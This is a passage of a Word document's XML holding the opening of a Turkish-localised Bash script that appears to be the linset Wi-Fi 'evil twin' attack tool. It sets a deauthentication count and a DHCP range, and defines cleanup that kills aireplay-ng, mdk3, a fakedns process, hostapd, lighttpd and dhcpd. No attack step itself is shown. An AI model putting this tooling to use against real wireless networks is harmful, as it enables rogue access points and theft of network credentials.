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5B6D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62235274" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="001F26E1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#BU PROGRAM GİTHUB/KOYUNBABAOP19 HESABI TARAFINDA OLUŞTURULMUŞTUR.GPL TABİDİR.#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46232715" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="4D9F23F3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6D3308E7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="59E967C6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="6A3EF975" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0CF4F83D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>LINSET_DEBUG=0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE403DE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>clear</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42752EF8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Veri depolama yolu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2497B956" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DUMP_PATH="/tmp/TMPlinset"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BADD887" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Yetkisiz bırakma sayısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0758AD68" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>DEAUTHTIME="8"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700113B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># DHCP'de kullanılacak IP aralığı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745E68BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>IP=192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E4EDE7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#Ağ Geçidinden bir ağdan bir değişken oluşturur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D87AFA1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>RANG_IP=$(echo $IP | cut -d "." -f 1,2,3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19697EDE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>#Renkler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F34DA25" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>Beyaz="\033[1;37m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A1B2EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>gri="\033[0;37m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5A271C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>eflatun="\033[0;35m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B1E10" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>kirmizi="\033[1;31m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DD0AD4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>yesil="\033[1;32m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF537A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>sari="\033[1;33m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09645324" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>mavi="\033[1;34m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D64758" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>yenidenrenklendir="\033[1;34m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7BEECE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="50854DFF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Komut Dosyasını normal veya geliştirici modunda ayarlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250DFE8A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if [ $LINSET_DEBUG = 1 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EAB1E0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>## geliştirici / hata ayıklayıcı modundayken / dev / stdout olarak ayarlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB6ABA0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>export linset_output_device=/dev/stdout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE2FD61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>HOLD="-hold"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1F4D6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AEA2A9D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>## üretim modundayken / dev / null olarak ayarlayın</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24717E9C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>export linset_output_device=/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3112FBA4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>HOLD=""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404C9BAB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FCC7D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="5D8B38FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Ekranı temizler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115BFAA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function conditional_clear() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A66A55C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2BB00" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [[ "$linset_output_device" != "/dev/stdout" ]]; then clear; fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CBD26" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6145F4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="64C571E3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="05AEFFEA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="259C5D72" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="7AB9A30C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="3EB0EBE2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="245625EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Bir hata alınırsa, DEBUG modundayken satırı gösterir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F9D35C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>if [ "$LINSET_DEBUG" = "1" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662E373A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>trap 'err_report $LINENO' ERR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16099EDD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A204241" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="129A7369" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Hatanın bulunduğu hattı bildirin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4A34AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function err_report {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD386CC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo "Hatanın bulunduğu satır $1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE7118F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67995F6E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="01EEFFEB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="48DC7EA3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Komut dosyası beklenmedik şekilde kapanırsa, işlevi yürütün</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF309C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>trap exitmode SIGINT SIGHUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCA4073" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="0D1767FA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4"/>
    <w:p w14:paraId="55FCA062" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t># Arayüzleri ve çıkışları temizleyen işlev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A1C324" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:t>function exitmode {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C8195C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81E418" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -e "\n\n"$beyaz"["$kirmizi"-"$beyaz"] "$kirmizi"Temizleme ve kapatma çalıştırılıyor."$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3818485B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="169CAA85" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ps -A | grep -q aireplay-ng; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13467388" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"aireplay-ng"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CAD943" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall aireplay-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FDA34D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6E9126" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C31FEC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ps -A | grep -q airodump-ng; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC4E4B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"airodump-ng"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52445781" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall airodump-ng &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DDDBE9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344A50A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="220452A3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ps a | grep python| grep fakedns; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2ED64" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"python"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB9D552" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>kill $(ps a | grep python| grep fakedns | awk '{print $1}') &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3962EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5694605B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541697D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ps -A | grep -q hostapd; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09789F81" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"hostapd"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BC917" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall hostapd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AE5E28" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F0676" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887C638" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if ps -A | grep -q lighttpd; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC14A8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"lighttpd"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F41415B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall lighttpd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15750F1C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D170D9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE32034" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ps -A | grep -q dhcpd; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03574FE6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"dhcpd"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A0D856" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall dhcpd &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00983469" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1F5976" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB80259" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ps -A | grep -q mdk3; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613EE6A6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Öldürüldü "$gri"mdk3"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452351BC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>killall mdk3 &amp;&gt;$linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703748E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9B74EE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1A65B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$WIFI_MONITOR" != "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B7A702" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Arayüz öldürüldü "$yesil"$WIFI_MONITOR"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578EC92C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $WIFI_MONITOR &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC887D6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770FD0F7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D084B9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$WIFI_MONITOR2" != "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8083C0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Arayüz öldürüldü "$yesil"$WIFI_MONITOR2"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634B2EB8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $WIFI_MONITOR2 &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564C3E1B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F775EA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41735F42" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if [ "$WIFI" != "" ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="021A4B3C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e ""$beyaz"["$kirmizi"-"$beyaz"] "$beyaz"Arayüz öldürüldü "$yesil"$WIFI"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C4F19F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>airmon-ng stop $WIFI &amp;&gt; $linset_output_device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F763CC7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66066ADE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3EB8EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
